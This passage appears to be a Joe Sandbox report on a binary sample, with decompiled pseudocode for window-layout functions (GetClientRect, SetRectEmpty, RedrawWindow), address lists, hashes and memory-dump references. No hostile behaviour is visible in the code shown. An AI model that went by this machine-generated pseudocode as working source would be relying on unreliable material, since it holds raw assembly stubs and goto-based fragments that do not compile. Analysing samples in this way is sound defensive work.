				if(_t178 == 0 || _t178 == 1 &&  *(_t294 + 0xd14) != 0) {
					GetClientRect( *(_t294 + 0x20), _t241);
					_t280 = 0;
					__eflags = 0;
					goto L65;
				} else {
					if(_t277 == 0) {
						_v32 = 0;
						_t193 =  *(_t294 + 0xc40);
						_v52 = _t193;
						__eflags = _t193;
						if(_t193 == 0) {
							goto L54;
						} else {
							_t194 = _t294 + 0xc3c;
							_v56 = _t194;
							while(1) {
								_t256 = _t194;
								_t195 = E00CF17E3(_t241, _t280, _t294,  &_v52);
								__eflags = _t195;
								if(__eflags == 0) {
									goto L78;
								}
								_t277 = _v36;
								_t109 = _t195 + 0x54; // 0x54
								_t294 = _t109;
								_t280 =  &_v72;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								__eflags = _t277 - _v68;
								if(_t277 < _v68) {
									_t208 = _v32;
									_v40 = _t208;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t280 = _t208;
									goto L61;
								} else {
									_t262 = _v60;
									__eflags = _t277 - _t262;
									if(_t277 <= _t262) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t280 = _v32;
										__eflags = _t277 - _v68 - _t262 - _t277;
										if(_t277 - _v68 <= _t262 - _t277) {
											L61:
											_t241->bottom = _t241->top;
										} else {
											_t280 = _t280 + 1;
											_t241->top = _t241->bottom;
										}
										goto L62;
									} else {
										_v32 = _v32 + 1;
										__eflags = _v52;
										_t194 = _v56;
										if(_v52 != 0) {
											continue;
										} else {
											_t280 = _v40;
											goto L53;
										}
									}
								}
								goto L82;
							}
							goto L78;
						}
					} else {
						 *0xe17a64();
						_v48 =  *((intOrPtr*)( *((intOrPtr*)( *_t294 + 0x354))))();
						_t294 = 0;
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						_v44 = 0;
						SetRectEmpty( &_v24);
						_t266 = _v28;
						_t219 =  *((intOrPtr*)(_t266 + 0xc40));
						_v32 = _t219;
						if(_t219 == 0) {
							L18:
							 *0xe17a64();
							_t223 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x354))))();
							_t294 = _v28;
							asm("cdq");
							_t277 = 0;
							_t271 = 0;
							_v48 = _v36 / (_t223 + _v48);
							_t226 =  *(_t294 + 0xc40);
							_v36 = 0;
							_v44 = 0;
							_v32 = _t226;
							__eflags = _t226;
							if(_t226 == 0) {
								L44:
								__eflags = _t277 - _v48;
								if(_t277 == _v48) {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t280 = _t271;
									_t241->left = _t241->right;
									goto L62;
								}
								goto L54;
							} else {
								_t228 = _t294 + 0xc3c;
								_v56 = _t228;
								while(1) {
									_t256 = _t228;
									_t229 = E00CF17E3(_t241, _t280, _t294,  &_v32);
									__eflags = _t229;
									if(__eflags == 0) {
										goto L78;
									}
									__eflags =  *(_t229 + 0x40);
									_t271 = _v44;
									if( *(_t229 + 0x40) != 0) {
										L32:
										_t271 = _t271 + 1;
										__eflags = _v32;
										_v44 = _t271;
										if(_v32 == 0) {
											_t280 = _v40;
											goto L43;
										} else {
											_t228 = _v56;
											continue;
										}
									} else {
										__eflags =  *(_t229 + 0x50);
										if( *(_t229 + 0x50) == 0) {
											goto L32;
										} else {
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											__eflags = _t271;
											if(_t271 <= 0) {
												_t230 = _v36;
											} else {
												__eflags = _v68 - _v24.bottom;
												_t230 = _v36;
												if(_v68 >= _v24.bottom) {
													_t230 = _t230 + 1;
													_v36 = _t230;
												}
											}
											__eflags = _t230 - _v48;
											if(__eflags > 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t280 = _t271 - 1;
												goto L39;
											} else {
												if(__eflags != 0) {
													L31:
													_t294 =  &_v72;
													_t280 =  &_v24;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													goto L32;
												} else {
													_t232 = _v52;
													__eflags = _t232 - _v72;
													if(_t232 < _v72) {
														_v40 = _t271;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t280 = _t271;
														_t241->right = _t241->left;
														goto L40;
													} else {
														_t277 = _v64;
														__eflags = _t232 - _t277;
														if(_t232 <= _t277) {
															_t277 = _t277 - _v52;
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															__eflags = _t232 - _v72 - _t277;
															if(_t232 - _v72 <= _t277) {
																_t280 = _t271;
																_t241->right = _t241->left;
															} else {
																_t280 = _t271 + 1;
																L39:
																_t241->left = _t241->right;
															}
															L40:
															__eflags = _t280 - 0xffffffff;
															if(_t280 != 0xffffffff) {
																L62:
																__eflags = _t280;
																if(_t280 < 0) {
																	L53:
																	_t294 = _v28;
																} else {
																	_t294 = _v28;
																	L65:
																	_v24.left = _v24.left & 0x00000000;
																	_v24.top = _v24.top & 0x00000000;
																	_v24.right = _v24.right & 0x00000000;
																	_v24.bottom = _v24.bottom & 0x00000000;
																	GetClientRect( *(_t294 + 0x20),  &_v24);
																	__eflags =  *(_t294 + 0xd14);
																	if( *(_t294 + 0xd14) != 0) {
																		_t191 =  *((intOrPtr*)(_t294 + 0xc48));
																		__eflags = _t280 - _t191;
																		if(_t280 == _t191) {
																			_t280 = _t191 - 1;
																			__eflags = _t280;
																			if(_t280 < 0) {
																				_t280 = 0;
																				__eflags = 0;
																			}
																		}
																	}
																	__eflags = _v76;
																	if(_v76 == 0) {
																		_t182 = _v24.top;
																		_t248 = _t241->top + 0xfffffffd;
																		__eflags = _t182 - _t248;
																		if(_t182 <= _t248) {
																			_t182 = _t248;
																		}
																		_t249 = _v24.bottom;
																		_t241->top = _t182;
																		_t183 = _t182 + 6;
																		_t241->bottom = _t183;
																		__eflags = _t183 - _t249;
																		if(_t183 > _t249) {
																			_t158 = _t249 - 6; // -6
																			_t241->bottom = _t249;
																			_t241->top = _t158;
																		}
																	} else {
																		_t188 = _v24.left;
																		_t253 = _t241->left + 0xfffffffd;
																		__eflags = _t188 - _t253;
																		if(_t188 <= _t253) {
																			_t188 = _t253;
																		}
																		_t254 = _v24.right;
																		_t241->left = _t188;
																		_t189 = _t188 + 6;
																		_t241->right = _t189;
																		__eflags = _t189 - _t254;
																		if(_t189 > _t254) {
																			_t151 = _t254 - 6; // -6
																			_t241->right = _t254;
																			_t241->left = _t151;
																		}
																	}
																}
															} else {
																L43:
																_t277 = _v36;
																_t294 = _v28;
																goto L44;
															}
															L54:
															__eflags =  *(_t294 + 0xd14);
															if( *(_t294 + 0xd14) != 0) {
																__eflags = _t280 -  *((intOrPtr*)(_t294 + 0xc48));
																if(_t280 ==  *((intOrPtr*)(_t294 + 0xc48))) {
																	__eflags = _t280;
																	SetRectEmpty(_t241);
																}
															}
															_pop(_t281);
															_pop(_t295);
															__eflags = _v8 ^ _t309;
															_pop(_t242);
															return E00DDCBCE(_t280, _t242, _v8 ^ _t309, _t277, _t281, _t295);
														} else {
															goto L31;
														}
													}
												}
											}
										}
									}
									goto L82;
								}
								goto L78;
							}
						} else {
							_t237 = _t266 + 0xc3c;
							_v56 = _t237;
							while(1) {
								_t256 = _t237;
								_t238 = E00CF17E3(_t241, _t280, _t294,  &_v32);
								if(_t238 == 0) {
									break;
								}
								if( *((intOrPtr*)(_t238 + 0x40)) != 0 ||  *((intOrPtr*)(_t238 + 0x50)) == 0) {
									L14:
									_t294 = _t294 + 1;
									_v44 = _t294;
									if(_v32 == 0) {
										goto L17;
									} else {
										_t237 = _v56;
										continue;
									}
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									if(_v44 <= 0) {
										L13:
										_t280 =  &_v24;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t294 = _v44;
										goto L14;
									} else {
										_t239 = _v24.bottom;
										if(_v68 > _t239) {
											_t275 = _v68 - _t239;
											__eflags = _t275;
											_v48 = _t275;
											L17:
											_t280 = _v40;
											goto L18;
										} else {
											goto L13;
										}
									}
								}
								goto L82;
							}
							L78:
							E00CAA4E7(_t241, _t256, _t280, _t294, __eflags);
							asm("int3");
							_push(4);
							E00DDD52C(0xe0b65b, _t241, _t280, _t294);
							_t199 = E00CA6842(_a4);
							_v8 = _v8 & 0x00000000;
							E00CA2C3F( &(_v24.top), _t294, _t199);
							_v8 = 1;
							__eflags = E00CA2A90( &(_v24.top), _a8);
							if(__eflags == 0) {
								E00CA20D1( &(_v24.top), 0x80004005);
								asm("int3");
								return 0xe873c8;
							} else {
								_t296 = _v24.top;
								_push( &_a12);
								_push(_v24.top);
								return E00DDD4FA(E00CA2975(E00CA6977(_t241, _a4, _t280, _v24.top, __eflags), _t296 - 0x10));
							}
						}
					}
				}
				L82:
			}

0x00cf0ef9
0x00cf0efe
0x00cf0f05
0x00cf0f09
0x00cf0f0e
0x00cf0f10
0x00cf0f14
0x00cf0f17
0x00cf0f1a
0x00cf0f2a
0x00cf0f33
0x00cf0f35
0x00cf0f3d
0x00cf0f43
0x00cf0f46
0x00cf0f49
0x00cf0f4e
0x00cf0f50
0x00cf0f50
0x00cf0f54
0x00cf0f57
0x00cf0f5f
0x00cf122b
0x00cf1231
0x00cf1231
0x00000000
0x00cf0f77
0x00cf0f79
0x00cf1162
0x00cf1165
0x00cf116b
0x00cf116e
0x00cf1170
0x00000000
0x00cf1172
0x00cf1172
0x00cf1178
0x00cf117b
0x00cf117f
0x00cf1181
0x00cf1186
0x00cf1188
0x00000000
0x00000000
0x00cf118e
0x00cf1191
0x00cf1191
0x00cf1194
0x00cf1197
0x00cf1198
0x00cf1199
0x00cf119a
0x00cf119b
0x00cf119e
0x00cf1207
0x00cf120f
0x00cf1212
0x00cf1213
0x00cf1214
0x00cf1215
0x00cf1216
0x00000000
0x00cf11a0
0x00cf11a0
0x00cf11a3
0x00cf11a5
0x00cf11f3
0x00cf11f4
0x00cf11f5
0x00cf11f6
0x00cf11f7
0x00cf11fa
0x00cf11fc
0x00cf1218
0x00cf121b
0x00cf11fe
0x00cf1201
0x00cf1202
0x00cf1202
0x00000000
0x00cf11a7
0x00cf11a7
0x00cf11aa
0x00cf11ae
0x00cf11b1
0x00000000
0x00cf11b3
0x00cf11b3
0x00000000
0x00cf11b3
0x00cf11b1
0x00cf11a5
0x00000000
0x00cf119e
0x00000000
0x00cf117b
0x00cf0f7f
0x00cf0f89
0x00cf0f94
0x00cf0f99
0x00cf0f9b
0x00cf0f9e
0x00cf0fa1
0x00cf0fa4
0x00cf0fab
0x00cf0fae
0x00cf0fb4
0x00cf0fb7
0x00cf0fbd
0x00cf0fc2
0x00cf102b
0x00cf1038
0x00cf1041
0x00cf1045
0x00cf104e
0x00cf1051
0x00cf1053
0x00cf1055
0x00cf1058
0x00cf105e
0x00cf1061
0x00cf1064
0x00cf1067
0x00cf1069
0x00cf1146
0x00cf1146
0x00cf1149
0x00cf1150
0x00cf1151
0x00cf1152
0x00cf1153
0x00cf1157
0x00cf1159
0x00000000
0x00cf1159
0x00000000
0x00cf106f
0x00cf106f
0x00cf1075
0x00cf1078
0x00cf107c
0x00cf107e
0x00cf1083
0x00cf1085
0x00000000
0x00000000
0x00cf108b
0x00cf108f
0x00cf1092
0x00cf10dc
0x00cf10dc
0x00cf10dd
0x00cf10e1
0x00cf10e4
0x00cf113d
0x00000000
0x00cf10e6
0x00cf10e6
0x00000000
0x00cf10e6
0x00cf1094
0x00cf1094
0x00cf1098
0x00000000
0x00cf109a
0x00cf10a0
0x00cf10a1
0x00cf10a2
0x00cf10a3
0x00cf10a4
0x00cf10a6
0x00cf10b9
0x00cf10a8
0x00cf10ab
0x00cf10ae
0x00cf10b1
0x00cf10b3
0x00cf10b4
0x00cf10b4
0x00cf10b1
0x00cf10bc
0x00cf10bf
0x00cf1126
0x00cf1127
0x00cf1128
0x00cf1129
0x00cf112a
0x00000000
0x00cf10c1
0x00cf10c1
0x00cf10d2
0x00cf10d2
0x00cf10d5
0x00cf10d8
0x00cf10d9
0x00cf10da
0x00cf10db
0x00000000
0x00cf10c3
0x00cf10c3
0x00cf10c6
0x00cf10c9
0x00cf110e
0x00cf1114
0x00cf1115
0x00cf1116
0x00cf1117
0x00cf111a
0x00cf111c
0x00000000
0x00cf10cb
0x00cf10cb
0x00cf10ce
0x00cf10d0
0x00cf10f1
0x00cf10f6
0x00cf10f7
0x00cf10f8
0x00cf10f9
0x00cf10fa
0x00cf10fc
0x00cf1105
0x00cf1107
0x00cf10fe
0x00cf10fe
0x00cf112d
0x00cf1130
0x00cf1130
0x00cf1132
0x00cf1132
0x00cf1135
0x00cf121e
0x00cf121e
0x00cf1220
0x00cf11b6
0x00cf11b6
0x00cf1222
0x00cf1222
0x00cf1233
0x00cf1233
0x00cf123a
0x00cf123e
0x00cf1242
0x00cf124a
0x00cf1250
0x00cf1257
0x00cf1259
0x00cf125f
0x00cf1261
0x00cf1263
0x00cf1266
0x00cf1268
0x00cf126a
0x00cf126a
0x00cf126a
0x00cf1268
0x00cf1261
0x00cf126c
0x00cf1270
0x00cf12a3
0x00cf12a6
0x00cf12a9
0x00cf12ab
0x00cf12ad
0x00cf12ad
0x00cf12af
0x00cf12b2
0x00cf12b5
0x00cf12b8
0x00cf12bb
0x00cf12bd
0x00cf12c3
0x00cf12c6
0x00cf12c9
0x00cf12c9
0x00cf1272
0x00cf1274
0x00cf1277
0x00cf127a
0x00cf127c
0x00cf127e
0x00cf127e
0x00cf1280
0x00cf1283
0x00cf1285
0x00cf1288
0x00cf128b
0x00cf128d
0x00cf1293
0x00cf1296
0x00cf1299
0x00cf1299
0x00cf128d
0x00cf1270
0x00cf113b
0x00cf1140
0x00cf1140
0x00cf1143
0x00000000
0x00cf1143
0x00cf11b9
0x00cf11b9
0x00cf11c0
0x00cf11c2
0x00cf11c8
0x00cf11cb
0x00cf11ce
0x00cf11ce
0x00cf11c8
0x00cf11d9
0x00cf11da
0x00cf11db
0x00cf11dd
0x00cf11e4
0x00000000
0x00000000
0x00000000
0x00cf10d0
0x00cf10c9
0x00cf10c1
0x00cf10bf
0x00cf1098
0x00000000
0x00cf1092
0x00000000
0x00cf1078
0x00cf0fc4
0x00cf0fc4
0x00cf0fca
0x00cf0fcd
0x00cf0fd1
0x00cf0fd3
0x00cf0fda
0x00000000
0x00000000
0x00cf0fe4
0x00cf1011
0x00cf1011
0x00cf1016
0x00cf1019
0x00000000
0x00cf101b
0x00cf101b
0x00000000
0x00cf101b
0x00cf0fec
0x00cf0ff6
0x00cf0ff7
0x00cf0ff8
0x00cf0ff9
0x00cf0ffa
0x00cf1004
0x00cf1007
0x00cf100a
0x00cf100b
0x00cf100c
0x00cf100d
0x00cf100e
0x00000000
0x00cf0ffc
0x00cf0ffc
0x00cf1002
0x00cf1023
0x00cf1023
0x00cf1025
0x00cf1028
0x00cf1028
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf1002
0x00cf0ffa
0x00000000
0x00cf0fe4
0x00cf12d1
0x00cf12d1
0x00cf12d6
0x00cf12d7
0x00cf12de
0x00cf12e6
0x00cf12eb
0x00cf12f3
0x00cf12fe
0x00cf130a
0x00cf130c
0x00cf1331
0x00cf1336
0x00cf133c
0x00cf130e
0x00cf130e
0x00cf1317
0x00cf1318
0x00cf132b
0x00cf132b
0x00cf130c
0x00cf0fc2
0x00cf0f79
0x00000000

APIs

SetRectEmpty.USER32(?), ref: 00CF0F1A
SetRectEmpty.USER32(?), ref: 00CF0FAE
SetRectEmpty.USER32(?), ref: 00CF11CE
GetClientRect.USER32(?,?), ref: 00CF122B
GetClientRect.USER32(?,00000000), ref: 00CF124A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$Client
String ID:
API String ID: 1457177775-0
Opcode ID: 6905c91290dcdeddc6333e0e2020ba5d075f32d7daddaeffc927669829596d11
Instruction ID: 3e15f368cba19c3ee0da163ba79f1ce5d2e5d58418df7f6cc99fd3c8888d36ae
Opcode Fuzzy Hash: 6905c91290dcdeddc6333e0e2020ba5d075f32d7daddaeffc927669829596d11
Instruction Fuzzy Hash: B1E14731900619CFCF55CFA9C9806EEB7F2BF49310F298169EA15FB240DB71AA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00D00262 Relevance: 7.8, APIs: 5, Instructions: 267
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D00262(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, int __esi, void* __eflags) {
				intOrPtr* _v4;
				signed int _v16;
				struct tagRECT _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr* _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v112;
				char _v120;
				intOrPtr* _t110;
				intOrPtr _t119;
				void* _t122;
				char _t125;
				void* _t143;
				signed int _t146;
				intOrPtr _t154;
				intOrPtr* _t160;
				intOrPtr _t163;
				signed int _t164;
				char _t166;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr* _t179;
				intOrPtr* _t182;
				intOrPtr _t197;
				void* _t207;
				intOrPtr _t214;
				intOrPtr _t217;
				long _t230;
				intOrPtr* _t232;
				intOrPtr* _t234;
				char* _t242;
				intOrPtr* _t244;
				void* _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t252;

				_t237 = __esi;
				_t184 = __ebx;
				_push(0x6c);
				E00DDD55F(0xe0bf5c, __ebx, __edi, __esi);
				_t234 = __ecx;
				_v40 = __ecx;
				if(__ecx == 0) {
					L24:
					return E00DDD50E(_t184, _t234, _t237);
				} else {
					_t257 =  *((intOrPtr*)(__ecx + 0x20));
					if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
						goto L24;
					} else {
						_t110 = E00D0A216(__ecx, __edx, __ecx, __esi,  &_v76);
						_v48 =  *((intOrPtr*)(_t110 + 4)) + 6;
						_v36 =  *_t110 + 6;
						E00CB8FDD(__ebx,  &_v112, __edx, __ecx, __esi, _t257);
						_v4 = 0;
						_v72 = E00CBA2B8( &_v112, E00CC19ED() + 0x11c);
						_v32.left = 0;
						_v32.top = 0;
						_v32.right = 0;
						_v32.bottom = 0;
						GetClientRect( *(_t234 + 0x20),  &_v32);
						_t119 =  *0xe87edc; // 0x0
						_v52 = _t119;
						_v56 = _v32.right - _v32.left - 2;
						_t239 =  *((intOrPtr*)( *_t234 + 0x35c));
						 *0xe17a64(__ecx);
						_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_t234 + 0x35c))))();
						_t258 = _t122;
						if(_t122 != 0) {
							_t179 = E00CC1A50(__ebx, _t234, _t239, _t258);
							 *0xe17a64( &_v68);
							_t182 =  *((intOrPtr*)( *((intOrPtr*)( *_t179 + 0x140))))();
							_t234 = _v40;
							_v56 = _v56 +  *_t182;
							_v52 = _v52 +  *((intOrPtr*)(_t182 + 4));
						}
						_t230 = _v32.top;
						_t242 =  *((intOrPtr*)(_t234 + 0x1dc8)) -  *((intOrPtr*)(_t234 + 0x1dc0)) + _t230;
						_v44 = _t242;
						if( *((intOrPtr*)(_t234 + 0x1dc4)) <= 0) {
							L8:
							__eflags = 0;
						} else {
							_t221 = _v32.right;
							if(_v36 > _v32.right - _v32.left - 5 || _v48 > _v32.bottom - _t230 - 5) {
								goto L8;
							} else {
								E00CB7A83(_t234 + 0xe68, 0, _t221 - _v36 - 5, _t230 + 5, 0xffffffff, 0xffffffff, 0x15);
								_push(4);
								_pop(0);
							}
						}
						E00CB7B32(_t234 + 0xe68, 0);
						_t125 =  *((intOrPtr*)(_t234 + 0xc40));
						_v64 = _t125;
						if(_t125 == 0) {
							L18:
							_t197 = _v32.bottom;
							_t76 = _t242 - _t197 > 0;
							 *(_t234 + 0x1dd0) = 0 | _t76;
							if(_t76 <= 0) {
								L22:
								__eflags = 0;
								_t243 = _t234 + 0x1610;
							} else {
								_t230 = _v32.right;
								if(_v36 > _t230 - _v32.left - 5) {
									goto L22;
								} else {
									_t272 = _v48 - _t197 - _v32.top - 5;
									if(_v48 > _t197 - _v32.top - 5) {
										goto L22;
									} else {
										_t243 = _t234 + 0x1610;
										E00CB7A83(_t234 + 0x1610, 0xe86aa8, _t230, _t197 - _v48 - 5, 0xffffffff, 0xffffffff, 0x11);
										_push(4);
										_pop(0);
									}
								}
							}
							E00CB7B32(_t243, 0);
							E00CBA2B8( &_v112, _v72);
							_t237 = 0x105;
							RedrawWindow( *(_t234 + 0xe88), 0, 0, 0x105);
							RedrawWindow( *(_t234 + 0x1630), 0, 0, 0x105);
							E00CF52FC(_t234, _t230);
							E00CF9B93(_t184, _t234, _t234, 0x105, _t272);
							E00CB9150( &_v112);
							goto L24;
						} else {
							_t143 = _t234 + 0xc3c;
							while(1) {
								_t207 = _t143;
								_t232 =  *((intOrPtr*)(E00CB29D4(_t234, _t242,  &_v64)));
								_v60 = _t232;
								if(_t232 == 0) {
									break;
								}
								 *((intOrPtr*)(_t232 + 0x18)) =  *((intOrPtr*)(_t234 + 0xb88));
								_t154 =  *0xe87ed8; // 0x0
								_t214 =  *0xe87edc; // 0x0
								 *((intOrPtr*)(_t232 + 0x74)) = _t154;
								 *((intOrPtr*)(_t232 + 0x78)) = _t214;
								 *0xe17a64( &_v120,  &_v112,  &_v56, 0);
								_t160 =  *((intOrPtr*)( *((intOrPtr*)( *_t232 + 0x1c))))();
								_t230 = _v32.left;
								_t217 =  *_t160;
								_t247 =  *((intOrPtr*)(_t160 + 4));
								_t163 = _v32.right - _t230 - 1;
								if(_t163 < _t217) {
									_t217 = _t163;
								}
								_t164 = _t163 - _t217;
								if(_t164 < 0) {
									_t164 = _t164 + 1;
								}
								_t166 = (_t164 >> 1) + _t230;
								_t252 = _t252 - 0x10;
								_v92 = _t166;
								_v84 = _t166 + _t217;
								_t168 = _v44;
								_v88 = _t168;
								_t169 = _t168 + _t247;
								_v80 = _t169;
								_t242 =  &_v92;
								asm("movsd");
								_v44 =  *((intOrPtr*)(_t234 + 0x1dc8)) + _t169;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00CF8AE3(_v60);
								_t234 = _v40;
								_t143 = _t234 + 0xc3c;
								if(_v64 != 0) {
									continue;
								} else {
									_t242 = _v44;
									goto L18;
								}
								goto L26;
							}
							E00CAA4E7(_t184, _t207, _t234, _t242, __eflags);
							asm("int3");
							_t250 = _t252;
							_t146 =  *0xe68dd4; // 0x8d2643c2
							_v16 = _t146 ^ _t250;
							_t244 = _v4;
							_v32.left = 0;
							_v32.top = 0;
							_v32.right = 0;
							_v32.bottom = 0;
							GetClientRect( *(_t207 + 0x20),  &_v32);
							 *_t244 = _v32.right - _v32.left;
							 *((intOrPtr*)(_t244 + 4)) = _v32.bottom - _v32.top;
							__eflags = _v16 ^ _t250;
							_t245 = _t242;
							return E00DDCBCE(_t244, _t184, _v16 ^ _t250, _t232, _t234, _t245);
						}
					}
				}
				L26:
			}

0x00d00262
0x00d00262
0x00d00262
0x00d00269
0x00d0026e
0x00d00270
0x00d00275
0x00d00528
0x00d0052d
0x00d0027b
0x00d0027b
0x00d0027f
0x00000000
0x00d00285
0x00d00289
0x00d00297
0x00d002a0
0x00d002a3
0x00d002aa
0x00d002c0
0x00d002ca
0x00d002cd
0x00d002d0
0x00d002d3
0x00d002d6
0x00d002dc
0x00d002e7
0x00d002ef
0x00d002f2
0x00d002fa
0x00d00302
0x00d00304
0x00d00306
0x00d00308
0x00d0031d
0x00d00325
0x00d00327
0x00d0032f
0x00d00332
0x00d00332
0x00d00341
0x00d00344
0x00d0034d
0x00d00350
0x00d00392
0x00d00392
0x00d00352
0x00d00352
0x00d00360
0x00000000
0x00d0036f
0x00d00388
0x00d0038d
0x00d0038f
0x00d0038f
0x00d00360
0x00d0039d
0x00d003a2
0x00d003a8
0x00d003ad
0x00d00476
0x00d00476
0x00d0047d
0x00d00480
0x00d00486
0x00d004d0
0x00d004d0
0x00d004d2
0x00d00488
0x00d00488
0x00d00496
0x00000000
0x00d00498
0x00d004a0
0x00d004a3
0x00000000
0x00d004a5
0x00d004a8
0x00d004c6
0x00d004cb
0x00d004cd
0x00d004cd
0x00d004a3
0x00d00496
0x00d004db
0x00d004e6
0x00d004eb
0x00d004fb
0x00d0050c
0x00d00514
0x00d0051b
0x00d00523
0x00000000
0x00d003b3
0x00d003b3
0x00d003b9
0x00d003bd
0x00d003c4
0x00d003c6
0x00d003cb
0x00000000
0x00000000
0x00d003d7
0x00d003da
0x00d003df
0x00d003e5
0x00d003ec
0x00d00400
0x00d00409
0x00d0040b
0x00d0040e
0x00d00410
0x00d00418
0x00d0041b
0x00d0041d
0x00d0041d
0x00d0041f
0x00d00425
0x00d00427
0x00d00427
0x00d0042c
0x00d0042e
0x00d00431
0x00d0043e
0x00d00441
0x00d00444
0x00d00447
0x00d00449
0x00d0044c
0x00d0044f
0x00d00452
0x00d00458
0x00d00459
0x00d0045a
0x00d0045b
0x00d00464
0x00d00467
0x00d0046d
0x00000000
0x00d00473
0x00d00473
0x00000000
0x00d00473
0x00000000
0x00d0046d
0x00d0052e
0x00d00533
0x00d00535
0x00d0053a
0x00d00541
0x00d00547
0x00d0054a
0x00d0054d
0x00d00550
0x00d00553
0x00d0055d
0x00d0056b
0x00d00573
0x00d00579
0x00d0057b
0x00d00582
0x00d00582
0x00d003ad
0x00d0027f
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00D00269
GetClientRect.USER32(?,?), ref: 00D0055D

Part of subcall function 00CB8FDD: __EH_prolog3.LIBCMT ref: 00CB8FE4
Part of subcall function 00CB8FDD: GetDC.USER32(00000000), ref: 00CB9010

Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2DC
Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2F4

GetClientRect.USER32(00000000,00000000), ref: 00D002D6

Part of subcall function 00CC1A50: __EH_prolog3.LIBCMT ref: 00CC1A57

RedrawWindow.USER32(?,00000000,00000000,00000105,?,00000000,00000000), ref: 00D004FB
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00D0050C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClientH_prolog3ObjectRectRedrawSelectWindow$H_prolog3_
String ID:
API String ID: 402754465-0
Opcode ID: 198e421a6af70261359eb74b6b930752251ff0bb10c74f5af690e93126686bc1
Instruction ID: c68ae32ad734c1c4b59c224cb0f0eece6bd51644da285b363892d2eb7a864a5f
Opcode Fuzzy Hash: 198e421a6af70261359eb74b6b930752251ff0bb10c74f5af690e93126686bc1
Instruction Fuzzy Hash: 9FB12C71E0061AAFCF08DFA8D945AEEBBB5FF48310F15422AE515B7391DB70A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D02CB1 Relevance: 7.8, APIs: 5, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00D02CB1(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi, void* __eflags, signed int _a8) {
				long _v0;
				long _v4;
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				long _v32;
				long _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				struct tagPOINT* _v52;
				void* _t96;
				signed int _t105;
				long _t107;
				intOrPtr _t114;
				long _t131;
				intOrPtr _t133;
				intOrPtr _t135;
				int _t137;
				intOrPtr _t141;
				int _t148;
				void* _t152;
				intOrPtr* _t158;
				intOrPtr* _t159;
				void* _t160;
				intOrPtr _t161;
				struct tagPOINT* _t162;
				intOrPtr* _t166;
				long _t167;
				void* _t181;
				intOrPtr _t188;
				long _t193;
				void* _t194;
				void* _t195;
				long _t200;
				void* _t202;
				intOrPtr _t203;
				void* _t208;
				long _t211;
				intOrPtr _t214;
				intOrPtr _t216;
				intOrPtr _t219;
				signed int _t221;
				signed int _t225;

				_t194 = __edi;
				_t193 = __edx;
				_push(4);
				_t96 = E00DDD52C(0xe08583, __ebx, __edi, __esi);
				_t158 = __ecx;
